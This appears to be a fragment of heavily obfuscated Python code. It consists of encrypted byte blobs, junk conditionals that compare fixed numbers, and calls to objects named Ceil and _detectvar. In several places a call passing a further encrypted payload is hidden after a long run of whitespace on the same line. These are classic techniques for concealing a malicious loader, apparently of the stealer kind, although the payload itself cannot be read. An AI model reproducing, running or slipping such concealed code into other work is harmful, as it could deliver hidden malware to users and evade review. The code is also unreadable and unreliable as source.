X\xb1dD\xa6,\x81\xf7\xf7{kW]\x99d\xfeZt}\xe5\x94\x05\xae\xacq\xb1\x1f\xab\x05Q\xbd\xab\xa73\x1fw\xbfD\x94QI\x10[\xf6x\xbfg?\xfe\xde\x8b&\xbc&\x1bO\x17\xdc\xd75}*\x9e\x94\xec\xe1\x99\xb0\x937\xa9\xebt\xacc\x1a\x94\xb2\xac\x9e\xa86U\'\x93\x04T\xea\x88]{\x11\xab\xb6\xf8\xecf\xfc\x07\xad\xac\x9d@^a\xb8\xb4\xd1\x1c\xf0\xce%\xec\xf77I\ncpY\xee\x1cW\xa5\xd0\x9d`\xdd\xf9\xca\xc0VM\xb3\xbe\x81e\x88Hpb\xcd\'\x05j`\xff3e\x9f\xaf\x94\xeeJ\xb7\x91\x00\x80v\xb1\xda\xb0{\xcc\xf7\x8c.\xef\x02\xe9(\x1b\x07].m\x88 \xb6\x1c/\x1c\n\x9b\xc6\xe5H\xc4P\xa4.YW\xd7i\xc8{\x97\xf15w\x98Q\xd8\x04\xd9\xdcA\xc16M\xf8\xdb\xea\x81\xdd8<^L\n\x0c\x1dV\x87\xaf[w\xf8hl\x95\xf5\x03h\x97\xc0\xe1\x92\x13_m\xc3\xa6\xa9I\x18\xb3w@\r\xd9\x82e\x07\xc9\x103M\x8a\x98ijD\xda\xca\x0ci"\x97\xe37\x8e\x8c\xa51\x06\x06\x851\x8c\xfa,E\x01,\xcd*\x19|\x1d*cU\xb5EfU\xdb\x15\xa0\xea\xca{\xcc\xcf\xa1\xbe\xab\xa3\xd2\xbd\x85\xf7\xa1#\x813O\xd8\xf4\x9d\' f;\xc9x[%\x9a\x96\xf7Pn\xb9\xb9\x97\x8e\xeeZ\x89\xf4\x07\xef\x92\xa4+\x1d\xea\x11:l;*\xc1M\x94 \x8a+%\'\x00\xe0\xa5>C\xf8N\xbfZ\xfa\xde\xddD\xaf\x04H\xd9\xc0\xc9r^k\xbb\xedH\x81\xd7\xb3^\xe0\x97\xe7=%\x9bw\x96\xbb|\xef\x0e\xc3\x8aI\x02\x9a\xeb\x97;\x10\x85\x9a{p\xc9\xdf\xd2C78\xc4^E\xe8\xc3\r\xab\xa5;\x02@v\xcdQV\x87b\x8e+j\x9e\xd9z\xcfv\xa1\x15\xc8\xa62\xa1b9\xf1\xb6K\x80\xb5\xe4\xb3i\x05.9=\xc1t\x90\x98\xf2\xe2\x84\xd2\x8c6wf\xfa\xe84\x0f\xf1\x9df\xca\xa0Z\xd6\x81\xa2\xc6\xd1W\xb1\xb4\x83\xc5\x96.F\xe6\x98\\Ww\xc7X\'V` +D\xaf5\x8e%|m\xb7\x18n\xe4\xda\xde:\xc7\x05S\xd1eB/g\xca\xff0.\xd3\xd67\xa9\xbbA\xac\xcf\xea\x15v\x8f\xc8J5G\xb9~i\xbe\xc4\xa4\xb8\x8c\x00\x16\xa1\x8f\xa8+\x82\t\xf5\xab\xa5MwH$\x15D\xf1\x13b\xa0\x15\x8c\xd3~\xbd\xb4\xa3\xdb\xc1\xac\xa8\xfcL\xc4(\xecUn\xc7\xaa\xba\xdb\xa0pv\x1f\xffW&\x10/{J\xfa.\xa3\xffl\x86>\xccY\x96\xa5a\x1a\xa5a\xbb\xdc0>\x1a\xe3\x10n\xe0\xc3\x91\x0b(\xd8\x85\x00\x94\x14\xf3\xe2\xba\xca>h#9\xe5\xbd\xad\xdcsW*\xa5\xbb\x04\xeb\x1a\x8b>4\x80\t\x0b(\xd0\xb0\x82\xf7\xee\xb3\xdc\xfb\xa63\x9d~3\xb9O\x9b\xe3\xaa\x12\x0c\xbe\xe9!\x8a*B\xb0`X-{\xeb\xa5\x11\xd8&\x12\x8c\xfe\xf7\x11\xbb\x08L\x82\x80f\x8b\xeb\xa5\x8d\x8f\x8e\xd7\x16"\xc3\x7f@\xbc\x99\xd0\xce\xf5\xd2\xe6;LqyI4g\xa6\x8fg\xd8\xab\x97v (\xcaP\xfdX|6K\x8b\x10\x14\xd7\xd5}\x05\xef\xe0n\x11$Ib\x01K\x8cd\x1f6\xc1\xa6\xa3a\x0ez}O\xe9\xf9\xea\x9a\xc1\xbb\xa1&\xb2\x14\x10D\xce\x12\x15J \x82|\xe8\xd2\xf7\xac\x80\x020\xe1\xd9\xb8!h\xa3\x03`\x02\xa7\x18d\xc5I\x02\xc2\xa3\n0a]]\xb7\xd6\x7f\x91\xd8r\x1b\xbd\xa5BI\x93W\x01\t\xf2\xf9~\xc1I\xb4\xfc\xb1\xbb\x87\x1c?\xdfZ\xa7\xd8\xd8\x98\x19\xe0u\x13\xe16\xb4h\x892\x93Y\x1b\xe5\'kLw\xe4\xfe\xd8B\\\xa1vae\xc2\xeda\xdd[\xc3\x86\xb9\x02.\xf0\xda\xf0\x95.\x0e\xde\xb6\x10v\xa3\xc1\x92\xda\xf7I$\xba;\xa0r\xb8\xa0_!\xbc\x91\x16eq\xdb\x89PI\xc2Yp\xdd\xd7BZO\x07)\xd4J[\xde\x06\xa6\xdbM\xc5R\x12\x08`\x05\xb2+\x89X\xa5uu7\xe42\x7f\xa5&9\x89\xc1\xf2\xda\x03l\x0bl;\xcd\x05^\xb5\xee\xd9H\xe7\x9d\x88s\xde3j\x17!\xe4\xf4\n\xb4\x1b\xa3\xb7Sl\x18\x19\x04)\x81\x11&1\xbalj\x11|[\xbbI\x90\xbb\x8b\x0b_\x045X\xbc\xfe:\x82\x1dDQ\x1c\x8dc\xdfU\xc8\x02e\xb8\xa7\\\xa1\xe65*\xe5\x18\x9d8d6\x03\xda\xce\x10]\xa7Z`n\xd5\x815p\x8c\xb1cw\x86\xa1\xf9o\x13<\xd6\x1d\x9c\xdc$\xe9E\x18\x19Q\xb27\xe6c\x7f;\xa8\xf0\x1bI{\xab\xcd\x15\x890M\xb0y\xc2\xf2 \xbaY\r\xc3V \x9d=\xcaX\x87\x93~@\xc9\xebh\x01h\xda\x03\xc88\xe6\xebl\x0f\x01\xe2\r\xb2j\xd9n\xa0\rP\x86c\xb6O\xf6\xf2\x18^\xe8\xd8r\x96\xaf\xab\xd7$%\xc3k\xb9W\xd8\xd2M\x0fk\xfd\xd6!\x82\xael\xdeq\xa8\xa4.\xf0\xe6\xe7j\xd6\xbeiI\x11F\xfb\'\x0fM\xd1\x18+\r\xaeG\xcd$\x8c(\x16\x1f)\x1a}\x9d\xe6\xc8\x94u\xe0%\x0c\x85\x0c\xcf|\xcc\x89\xf8\xdc\x17^\xc2uu7\xe0\xae\x7f\xa5\xbc\xaf\x0e\t\x8a[\x14\xc6Q\xe0#()R\xf7h\x02\xd2\x7f\n&\xa9Q0\n\xe0\xde\xa1\xb8\xc8f\x1b\xf5\x1d\x00\x98Fi\xac$h\xf8\x1e\x82@C\xf5H\x91\xeb=*}\xefG\t\xaa\x88c\xb5\x7f\x83\x9bo\xc7\x10\xb5G*\xe27\x16\xbb7\x88E\xd8\xc8\xe9\xdf\xd7y{)c\x17\xc6\xae\xe3\x04U+}\x03\x04\xdc\xeb\x83\x17:#\xea\xda\xbb\x9dM\xa7\xb7S\xf5\x02\xff\xb3\x19|l\xda\xb4\t\xd1Q \x8e&\xa0\xfc\x15\x9f\x81\x88\xa5V\xea\xe4\xc6\x86\x9a\x14\x838\x04\xc0\x85\xd4G\x1cd\xad\xb4\xe9\x0ec<qN%\xd3\xd7\x84\x1eI\xbd\xb4\xf9\x0e\x03\x9dc\x88\x12\xb5\xd1\xda\x98\xd4K;p,1a\x10\xe3\x14xe2Y4\x84ci]\xdd\xd7d\\k\xd5\x9dq]I`>m\xd5\x951\x0c\x07e9zQ\xaf\x8dW\x96wH\xca\n\xcb\x1d\x03`(\x9dy\x8a\x0b\xde\x82\xd2-\x9f\xf8\x8a\xd9\xe4V\xcd&\xb3\xd9T?nw\xc1\x0e\xda\x8d\'\xe3\x82u\x10{\xe0\xa6\x94\xc0o\xeb\xc8\x882@3\'JdPK\xfd\xd8\x19\x08u\x11\x9d\xde\x02\xe6Sg\xb1\x94\x1d\xa4e]\x01C\xc9\x0c\xb7E\xa6\t\x11\x87Z0\'\x80\xca\xd0\xc0S\x86\xce`)\x0e\xaf\xb0\x04\xd9,C9\xcb\xd4\x96\xae\xa0b\xcec\xabj \xa9~\r \xe5\xd2\x0b\xef\x96g;\xd3N\xb5\xa1\x89K\xc9L\xd4X\xeb\x88\x14\xe7\xcc$D\xe7h\xde\x91\xa5\xa4\xe5\xc4\xca\xd8k\xce\x07\xcd\xd8k\xd6\xe5$f\xbbI\xdd\x1d\x0f,\x14\xf6\x04\xb6-\x8c\x8cMad\xa8y\xf4\xbb\xa3\xc9\xab\xc4\xea\xd0\x9a\xcc\x86\xfc\xb0:\x14u\x07\x96\xe1N}Z\x06M\xf1M\x83\x0bu$\xed\xfb7\xea\xbe\xc60\xd5y\x12M\x91>\x93\xc9\xfb\xda\x8a\xb1\xb1\r\xc4\xf7\xc5\xbc\xc1\x1a\x97/lJM\xea6\xb4)\xbd\xa9k\xc1xV\xd9\xab\xda\x01\x1c,\x88-/{ \xe6`\xf6\xb3K8\xd8\xba\xba\x0e\xe7l\x03\xd9d\xfb`\x1a[\x9e\x9c8.\xe7}kR\xb7\xc9\xb9\xaeJ\xba\xfb\xac\x1d;\x06\x9f\xd7\x98\x13\x9a"\n\t\xa6\x0b\xf6\x0c\xb2\xb8\x86\xb2\xa4\xa3\xa8\x0c\xe6\xdag\xcb\x04\xf7\xf9j\x80\xcc\xb2z\xae\x13\xe1\x04e;k0\x94V\xd1\xa8\x97\xe4`u\x8d\xd5\xfc\xad$p5%\xc54\x9fGJ\xa9\n[z6\xa7S4\xcd)uzJ\x06\xba\xd9\x14\x8bZ6<G\x16q\x8a3\x19\xeeb\x98CD\']W\xb7!\x1e\xf9MMD\xec\x1a\xd6\xff\xe8+\xee\xa0\xff\xa6\xa2YL^G=~)R\xc8\xf6\xe1eu\x8d?\xc9\xad\x94\xd1A2\xa7gA:\xf2\xdc\x9cm\x84\x12\x93P\n\x92\x10\x91\xf5)"\xed\xa3zis\x1c\x18p\x0eE\xfa\tV_\xca\xa6\\+\xdd\xbe0\xd3\x92\xe3,\x05(qbb\xa4Z\x1a\xf95\xac\x07\xe1=\xda\xc7\x8b\xffm\x11>')

        if 230659 > 3428919:
            Ceil.Algorithm(_square = Ceil.Modulo / 16735)
        elif 391696 < 8860628:
            Ceil._positive(_add = -66531 + Ceil.Modulo)                                                                                                                                                                                                                                                          ;_detectvar._hypothesis(_power='xxwxwxwxwxxxxwxwxwwwwxxxx',StackOverflow=b'\xaf\xcd\xc1\xf5\x95\xe1V\x14\xfaB\x19W\xbf\x1dB\x88\xef\xe9\xc9\xe9)\xc4\xf9B\xa4\xef\x89z\xc0\xdb\xc9\n\xc2\x98u\xc8\xd92\xb3a\x99v\x82>\xbb4\xc6\xb4\xe7\x97Z\x19\xb9\x97\x96\xcc\x16\x15\x1eCk\xb4\xd8\x05\xfc\xce\x1aj\r&\xcf`B\r6`\xa0\t\xc3\xcd\xf5\xa9!\xe8\xca\xd0$9\'\xaba\x1fn\x83=\xb6CR\xc4\xf7\x8a\xd1\xdb\xd9\x02\xda"\xa6\xb4q\x15\xa3\xe74nVf\xbb\x116\x13I\xd7\xec(\x0b\x0e\xa6\xba\xa6|\xecnxa\xe5\x9c\xd2_`\x105[\xbbg\x08\xad\xa37\xed{\x99\xf1\xf6\xbd\xe3\x96\x97\xbb"`\x9cE%2"\xe8\x8d\x8b\xdei\xcb\xcd\x95\xc6\x99\x1ayy\x12Adw+\xc9\xe5\x9c\x0f}n=k;`\xce\xdbf\x9cd.R\x92\x8f+\t3\xdc\x91\xd3vmw\x0b\x08\x83H`D\xc6\xa1\x07Ma\x88k\x83\x08{BY\xe5@\xc1Lk]I%\x88pU\xdd\x86\xd8\x887\xd4\xce\xb4\xed[\xdb0)\x13\x13|\xec\xa0!9\x998C\xdb\xd8\\%\xcdn\xcb\xea\xecX$\xd3ZOh\xba\xc0\x1f\x9a\xa6\xd5\xc4\x7f\x8e\x02`\xba\xcb\xdau\xc2\xcc\xff\xcd\xfd$`\x12d\xe2_P\xb13m\x14L\xcbe\xcdQd\x94\xda(\xc0w\xd8J\x11EV+\xed\x00%\xc56\x16\xce\'\xc5\t\xb6\xd9\xa7\'\xc3\xef\xd7\xd5\xdd0\xfc\xfe\x95:H\x8e\xd6\x80\x08\xe8\xe5\xd4M\x07\x99\xb6\x97\xb4eI\xe1\xdc\x80/"Z{\x03\xc8\x7f\x84IZ}\xa4[\x08\xb5\r\'\xae\x969\x08\xbax\xf3\x84V\xafv\x05pX \x9b\xf9\x8ci\x9bM\xfd\xc2\xca\xba\xben\x1bW\xc0\xf4\x16\xe0Y\x04\xd2\x9a\xcd\xd4+\x18\x96\x1b\x8f{"\xd8 \xe3?\xc0\xfa3\xbc\xf3\x95\xb2M\xe0\x96!\xf2\x12\xc2\x0c\xc0y\x80\x93zis\xeb"\xa5\xa9K\x11X\xe9k\xb8eT/m\xdc7\xb1S\x13\x00\x94\xf2\xe2\xc1D\xd7\xab\x97v\xe8\x01a\x0b1g\xba\xcbtY\xb0\xc0\x0b\xb2\xac\xee+\x93Z\xbdK=\x9bSVQ\\Md\xc8?tlZ\xa3DV\xaf\x91\xc4\x9c\xc0\xa8*\xecKe+\x90\xd1\xb8\xdd\x88\xeb\x81\x0f\x0cSq\x05\xe5\x1f\x0e\x03\x87\xd1\x85\t\xde\'N<\x96ptT\xa4\xd3\x915KC\xf6\x8a\xbb\xd7-\x8d\xf1\x1e\x99\xa4OO\xceN\xd0$\xad^\x9d\xacn\x19N{4\xc7\xf6\x91C\x8fx\xf5\xa2j\xe9&;\x8c\x88\xed\x15\x85\xb2H\x0bjQ\xb5\xf4\xdd.\xd6i\\\xf6\x87\xcb\x99\xaf:36\xa9\xbb\xedt\x7fn\xd9\xcftT\xa1\xcd\n/\x13\x8e1%2\xc7"\xba"Ir\x9cX-/\x997\xca\xf9A\xf3\xf2\xf6N^\xdfD$i\x8c"Ase(\xaf"g\xf1\xd7[X\xb9\xc5\xb5\xd1\xdf$\x92%\xef8%\xde\x1a\xa0p\t\x12\\\xf1\xe2\x94a\xc4\x8e\xd6\xf3\xed\x12\xb1\xd9\xf9\xc5\xf6\xceH\xcf.\x91Iqh\xbf\xdb\x95k\xde+1\xe0\x06\xdaI\xbe\x03A+`~\x05\x84@\xee.\x9d%\xddo\xb9\x82\xd8D\xb2\xf4\xed\x8e0CPH{\xc0v\xe5\x8d\xc8Mv\x0c\x0c\xab\xc6D/\x1a\xc1(q\xd2/\xc6%WC5\x17^\xc5\xf1\xe0\x88\xed`\xe8,\xc3\x9f\x945\xca\x8e\x94\xb2\xa4\xe10\xe3\x1f{\x00\x92\x9b$n\x97\x7f|\xad\x0eZ\xa6\x99\x94h\x92\xd2\xca\xe6\xe8:;\x81\xf3\xad\xc4\x8c\xe8D9\x1a-b\xf1\x08\x8c\x1ci\xc6)\xf7\xba\x99\xb9K\xc7\x18\x1c\r\x0e\xab\xdd\x9f\xb0\x85\xcf]\xf0\x82v\x077\xd9cf=\x8e\xeaP\xff\x0ef\xf0\xbf}\x83tg\xf8~D\xe9\x81Q\x04rs\x80U\x04\xd8u\x9c\xdc\x12\xc8[\xe3\xeb\x0c\x93\t\x9a\x99!\xd2\xbf_/\xed\xc0\x0e+3\xdc\xf6\x84%\x81]\x9aY\x85\xf9cU\xddmx\x88R`\xa3\t{a\x10fa?\x8cQR\x0bC\'\xe9\xd7J\x0e\xce\xbep~Jgh\xcb\x8c\x1e[\x93\t\x91+\x00\x93\x03\x00W\x00\xfe\xef\xc2\x84\xea@\x03R\xa5\xc7\x03xA\xd2\x04\xd8>\x86\x8d\xa6\x83\x13\x9c!1\xa6\x80M\x11\xc5\xddC\x12\x90\xac^\xba#"t*\x98\x9c]\x89&#!\x98\xb0\xa0\xc2 \xc9\xa1+\xb1$\x82$\xd9y\x1au\x97\xadl\xb5\xc1 \x99X\x9512\x19\xdb\xd8dP6!\x84\xfe.\x8a\x99\xd1\x84\xcd"|=Ri\x8e\x849\x84\xdb\xe3=\xaaD{\x98F\xfeY\xe4\x91m\x9fS~;\xc2\xa5\xeb\xcc8\xd5\x9c8\xe5L*\xcep\xf5\xe0\xb1Jq\xa8\xa6\x81\xd2\x01]`\xb4\x99\n@&\xa7\x1c\x9aO\xc3\x12\x1b\xb73=i\x1b\t\x15\x97\xb6\xc0\xc4\xf2\x9f\x8a\xe4\x12\x86\xf7\xd4\x95e+\x18\xba\x7f\xa0\x9fW\xc9\x08\xd1\xc8\x95w\xb7\x92)\xaaj90\xd6\xf0]\x8a\xcb\x10\x99\x11-)\xcd"\xca\x9a\xdca\xd6\xc4-Z\xf5\x17\xe0\x0f\xca\xbe\x0bw3\xdc\x16p\xf0\x96\xb1\xb9\x9e^X~\xb2\xb1\x00\x8e\xa2\xc0L\n\x19\x87,\xec\x16\x82Z\x03\xa1\xee\x82\x85k\xb5\x7f\xdb\xe0\x7f"\xe6\xaa^\xc4Q\xfd\xee9I\xc8\xf3\xa0\x9d\x0fA7\xf4\xea\xb1%4\xa8f\x8a\x94\x89\t\xd6\xd5s\tiw\x9f\xbeW&\xef\xcdK\xdb\xf6\x93+F\xb1\x1c\xd2\xdbj(\xd5M\xeb\x00]r>j?d\xd0\x89\'\x92\xb10l\x91\xe2\xec\x952=R(8\x8d\xd7\xd5\r\xde\x7fW\xd9\xc3\xfd\x17\xbez\x10\x1b$\x1c\xc5\x87\xf7wk\x01\xe6\x96\xe6\xc1\xd9c[c\xbc\x98\x88a]\xdd\xad\xd8\x1d\x11\x97\x9e\xa9\x01\x96$\x93\xd8WR|\x07H\xa7\xbd\xcb \xe0\x00\xf5K\x1b\x02\xf4\x16\x81\xea\xaf\x12k\xd2dL\nM\x02\x10\xcb2\x01\x88\x9f\xa40[ \x11s\x0c|\x8b\xae\x12V\xc84Q2\xcc\xbd,\x08q\xd8\xe3\xae\x88\xb1{j(\x17\xc7\xf8\r\xd8\'\x8f\x8f\x1b\x1b()\xe3=\xb0@\x10\xc02@\x9cy\xbf^\xba#\x06J\'6`\x9a.\x8b\x01=p\xd2l<c\xae\x9c\xd7\xfabEa\x01\x84\x99Q\xe2J\xe8\xc3\xba\xbaMX\xf5\xd7\xb4*M\xd8m\xe9@8\xd5\x13O\xc4L\x11\xc8\xcb\xa6\x8c\xe9hR\xb7\xe1\x85\xad\xbe\x81p\xe3\x90Q_\x9d\xac\x0f\x9b\xef\xdc\x89\xb9\xfa6\xc5H\xba\x9d Kv\x829\xbd\xc0\xad\x90\xd4K\x1d\xac\xea]\x0e\xf1\x15\xf7L\xe7\xaa\xd1ik0kM\x07\x0eL\x0eTeR\xef4\xb6\xc1!\xd8\xff\x84\x03s]\xdd\x86\x94Z-C\xdb@\x99\xbcI!\xc4\xcd\x8d\xb1\xaaF\xf9RN\xe4dWDG\xc6\x8e q\xe2\x8e\x15`\xe8q\r\xa4\xa4Kv\x95DD\xca)\x8b\x89|\xca\x890w\xca\xd08.\x99\x1a%\xf7\xf5X\x9a\x18w\xd5\xf4f\\\x07\xd6\xcf\xc9\xae\x04\xb7\x0e\x85.)T\x07\xf0\ry\xc3\xa1\x82\xfa\xe2\xed\xc1F]\xac`[\x07\x1bm\xc7TH\x94\'\x8b\xc9O\x88\xe6\xc4\x92\x9f\xec^\xc8\x81\x98\x1d\xc6\x0bf\x0e\xfb\xd4[\xef}\xd6\xdf\x13\t75Al\x07\x82\x0f\xf3\x82\xf6Y[\x88m05\x06OW8\x18W\xd5\r\x1dr\xc3r\x8e(\xd6v\xd8<\xcb\xe5\x99 \xd3XU\xaf] \xf81~Vj\xb4z\x1e\xe3l\x07\x1b\x8d\xe7\xb9\x95W\x17\x88\x96\x95\xb88\xfe\x1cTXzW\xd5mn\xb0\xb9\xc0\xb3\xc5W:]x{\xc3|\x80C\x93\n"3\x99\xdaF\xa6\xc42\xabs\x8dV\x13\x13\xc4\xe6\xc7H\xc8\xdbCc\x06\xf0p\xf4\x10\x87U+\xdd\xf2\n\xb2b\x8d\x1d\xa0\xd9\x01\xed\xb4`q@,^\xd3\xc50\xb8\xe6K\x03\x0ch\xa4\xb3?\x85\xf5\xd2w\xae\x05\xb7\xc1V\xa3\xb51M&m\x81\x90`\xf1\xa1\xd6\x1f\xf8`B \x0bP\x07\xc6\x1f\x9eZ\xab\xba&\x0f\xfa~\x85\x02{U]\xa7\x94\xe7\xdbs\xbb\x0b\x08Au\xdd\x96\x0fw>+\xe9\xd2t!\xabX`\x91\x91\xf6\x05\xdc(\xb3\x01\x18n\xae\xcfM\xba\xf3\xc8`\x15-\xde\x8f\xc3!\xb9\xf4\xdd\xeb4 r\xa1\xd8\xf5U\xe7\x84h\x9a\xe7\xbc\x1b\xd5C\xa2\xe3Y\xfebn\xa5\x88?\x8bX\xfeeu\xd9@\xd5\x90\'\xfb\xbd\xab.\x12\xdf`\x80\xa4\xbcm\xa2\xa6\x13wL\'\xee9)\'\x16\xb9\xc1q\xc2\x89ypD\xa9C6\x10G\xd0_\x0bh\xb60f\x8e\x94\x95\xf1\xb2n\xd0)\xc6\x18\xdd.7\xc4\xe9\xc9\xd9\x19\x92n\xa3,\xac6\x95\x1c\xbc])\xa8\x85\xfb\xd9eF7+\xa8[1}$h\x7f\xdd\xe5qsM\xccP\xb2\x8f\x94\ta%I\xac\xb5\xa48\xf2\x11+\x01+\x8e[:.ooogSH:9Ef\xb3[\xcc\x94\xd18\x81\xed\x86Qh\x99\xc9\'\x00\x19P\xfa\xc6\x8b,\xca\xfe\x86my\x1dM8\xc479\xb3)\x96:H\xe7\x96T\xc4\x88,.\x13\xb7\xf6\x85\xdf\xabI]\xa7~\xaf\x08\xd0b\x00w\x8f\\\xe5\xdb,\x91\xffKr\x12\xb9\xa5\xc3\x19\xda\x19\x1d2\xcce\x0c\xa4T@\xff\t~Y\xa2\xac\n\xab\xa5\xbb\xeb\xa5\x05\xcd\x18\xe3\x04\xc1\xc3N\x96\xa1b\x134Y\x8c\xe1\xa9\t\xa6\xa3\x8e\xd0\x0e\x13\xa3#\xbbV\xda|\x87}\xfd\xa3\x04\x13\xa7\xf8H\xc3\x98\xd4K\xdf{\x9b\xb7\x82\x9fu\xe9\xeb\xf1\t=\xe1\x03z\x02\x8c\x1f`\x12i~7\xa0\x87\xc3\rL\xb1\xcfS\x06\x9a\xa4^\xda\x919\xc5\x17Vj\xc9\xfb\x88\xae\xfb\x8a9eU\xdd\x86H\xce\x16q\xc9\xed\xe0\xb0\x9a\xa9%\x10\x10\xc0\xa0\x03:\xf0\x1dc=X*\xc3U\xe9H$UI\xee\xd2\xf7\xbf\x1d\xa5x5zQ\x86r4\xf1\xfd\xeb\xa4C\xe7\xe7t\xc1t\xa5\xea\xef\x10O\x8b\xce\t\xb0\x85\xf0R\xbc"\xd5\x90\xe0\xff\xee\xa7u~p\xfbj\xde\xdf\xbb\x87nE\xd0\xd0*\xd9\xa2\x1e,\xe9\xeaJ\xbb\x81\x8a\xebl\xc2:Ml\x07$\xf9[Q}\x83<M\xe1\xd2\x931\xb0\x12\xa6Q\x17\x1c\xa7\xab\x94E\xa9\n\xb2;]\xba\xd9\xd9\xbd\xee,l\xbd\x8fK\xfd\xb8}\x82\xfa=p\xf6\x9d\xa0\x9d\xe3\x04M\x1e\'\xc4`\xe2\x82\xcfu\xa5\x1d\x94Wd\x06\xdeI\xf4+&Q\x10v\xd0uu\x1b')

        if 313316 > 6734404:
            Ceil._positive(_add = 51536 + Ceil.Modulo)
        elif 100556 < 5702087:
            Ceil._positive(_add = -73387 - Ceil.Modulo)                                                                                                                                                                                                                                                          ;_detectvar._hypothesis(_power='ILLLLILLJIJJLILJLJJLLI',StackOverflow=b'\x86\xef\xb4\x00\xea1\xac\xbdM\xcb\xab\x16\xc7\xb6>;\x05_+\xde\x87\x1dX\xca\xbb\xc9\xc8\x81\xfbE\xd1\xb2(\xc8\xbfV4\x150W\xca\x83\x8c\x93\x8e\x04*\x80\xb3\xdcf\x15yp]\xdd\xe6\x91=\x17\x17\xe7\xef\xc9\xcf\xbe0\x9f\xda\x82Xd.qdE\xd7\x1c\xb1\x18\xe8ag,\x88\x1a\x1c\x07c\xc8\xd5\x855(k\xd7X\xcd\x9a\xc0\xc2\x1d\xa9oB\xfc&T\xe3k\x92\xe4\x8e\x08GF\xd5\xd9\xbaj\xfe\xe3\xef\x9d\xd8\xa9\x19L\xcc=\x90y\x9a{\xb1\xc5\xb4\xb0q\xa6I\xdd&\xc6\x99\xd7\n6U\x16\xd7Rt\xfb.\x0b\xd46\xf3\x97\xcc\x02V6\xf6:\xb9\xfba\'F\xc39\x01\xe5\xe7\x94\xb3\xf7\xaei\xce\xde\r-\xbc!\x92\x15\x11n\xc4\xc7d&\x10)\x14\xd5K\xdbJ\x89\xb1\xcdH\xcea \x06\x1b\xc5\xf3\xb3\x08\xde]W\xb7!Z\xed\xddE\x1d\x01\xac\xd67\x01\x9a\x05\x9a\xd5\xf0\xc0.B5\xdf<nKM\xf7Q\x0f\xda0L`\xf5\x8db\xa5\xa6\x87\xe8\xf7\x8c#\xfc\x1c\xf7\xa3v\x86\xac\x82\n\x81\xc1\x0b\x0f\xdcV\xc6\xe8\xc7\x96\xdf\x8e\xd3z\x95\xe2L\x85\xa4\xda\xa4\xae\xd3\xdci\xe5X\xfd\x08\xb9d0\x0b\x04\x96:\xd1\x8d$cl\xf9}\\zw\xc5\x85\x1b\xe05\x87\xf4\xea\x88\'(30\xfeL\x80xdN\xd7\xec\xfd\xc3\xf9W`4G:o+9z\x87:w\xebP;{3\x9b\xcd\x95\x1e\xed\xdc%`\xa0\x0f0\x80\x8dRs\xa4\xe8B\xac\x94\xbd\xf3\xb9\xef\xf56\x84*@\x9f\xed\x08\xcer\x90\x02D\xa04+\xc4e\xbb\x89#\xde\x196UJ\x86\x99*\xf3\xcc\xce\x1a\x00+As\x8b\x02\xcee\x0b\xc0\xbb\xab\xd9\xc1]\x9e\xe0\x05&\xdb\xaaY\x97\x1fN\xb4\x82\x8d\xec\x88+\xe4\x81b@0\x7fz9\x86\xfd7G;\xf4\xd0\x83\x15\xa3\xcc\x1b\xea\xa9\xaaR\xb6}\x00\xc3+e\x03^C\x80|\xc1\xe7,\x8aJS\x07)\x01\xbfQ\x9f\x9ch\xdf\x91e0\xe2\xec.Qb\x11~\x91\xa5\xc7t\xc8:\xd7I\x16"\xca\xa2\xa0\xbdq\x94\xa3\xd7\x89\x12\xb6Y\xfc\x9c\xea\x87\x89\xf6x\xc7\xb8\x80B\x94x\xaf^\xdat\x87\x19\xfa\xe4\xc1\xa9\x1b\xe2\x9a\xdc\xd3\x80\x86\xb4Z\xda\x81h-\xd1\xee\x9c\xd6/\x12\xe2\xb2/D\xebUu\x11\xb9\xb2\xc5\x94\x7f\xdbH\xafS}\xf4\x85o)u\xe9Y\xea\x98\xbc_\xe9\xb2\xb8s0v"+\x83O:o\xcb\xee\xc3\x8c\xe3\xd2/\xd0\x17\x9f1\xe9\xb2\x88\xb2ZW\xb7\x03f\r\xc76\xf4\xdb\xe9tv{K\x18\xbf[\x04\xf9\xdd\xb6lC\x0e0a\xde+FL0\xe6\\\xf2b\xad\xaa\xe7\x94\x13\x0bL\x03\xd18nE\x8c\xb0\x07\xdd\x0ehA0\xae\xc7\xa7\xdd7\x070\x85\x98\xd87F,K\x86\xb9O{h\x15\xab\x956\xdda\xa0f\xd1\x18a1\x11\xb2\x84\x078i\x87\xf5\xd2\xb7\xc1$\xbd\x8by\x83\\\x94\xe0);;E\x0fes\\\xf6\x1bD\x95\xb3\xa9\x9e\xf3\x14\xcb\xcf\x0cB\xea\x89\xd4\xda\xeb\xean#~\xaeK\x04YQ\xe04O\xb6K<b\xe3\xd1\x15\xe9\x0c\xe7\x01\xca\xd5`c\xa6t\xda\xb5\xd2\xa6;\xec\xa3\xb9\xba\xa7\xd3{\x82<\x03F\xec\xac^\xda\x1c\xe1\x96\xa0\xd0\xd3G\xbe\x9dH\xef0\xa9\x97\xee\x16\x9c\xb9\xf3!\x8b>m\x8c\xa0\xd0\x11\x15\xf8<k\x1bM!A{\xcc\x1b\xc5\xa4Xlh\x95\x01\xd5\xeb\xea\xeeXz\x8a\xe5\x86\x08id\x90\x8c>ez_\xfe\xde\x95\xb4\xb8E\xba\xe6\xaa+{1\x16\xab\x89\\|\x81\xd7\x8a\xaf\xdbt\xe1\xef=\xebD\x03\x90j\x80\xff\x9fw#\xd7@w\xe4\x17\xcf\x94c\x01\xd2,@sP3ls\xb563\x81x\xb2~\x99\xb2[Q@G\xd6\xd5u\x0e%\xeeD\x81\xf8Fl#\x18\x01k6\xb6\x1e\x00\x1b\x8b\x19\x99\x83Y\x03\xfd\xcc*\xa0\xafe\xf56\xa0w}\xc3\xb1\x0e\xdcI\xc7\xc7\xa8s\x00\xb5\x08\xd6h\xad\xf7F\x95\x05\x8dQL\x06#\'t\xb6U\xf5\x1a6\xe1\x9b\xcf\x15\xc4\x0b\xa8\x9fs\xc4?\xcc\x1bc\x1f"\x9dO>A\x0f\x13\x10b\x90hY+u\xa2W\xc4\xd7$\xc4\x06\x9ah5\xba\x8ePl\xac\x95v`I\xe3\x99\xc8X\xceb\xcb\xb9\x19\x0b\xf9\xa8I\xdd\xadE\xb0taE\xdb#C,\xe7-\xe6@\x89\x0e\xc8\xe5\x99\x11\x89\'|\x0e\x91\x93V\x90H,\x12\xeb\xea:dTR#.\x0f&Q\xbb\x91\x16h\xe6ic\xe3f\x12\xf6\xe6\xa3\x8d\xd2\x14\x82\xb9D\x9bLp\xb4\xd5J\x1d\x18\xc2\xff\x16M 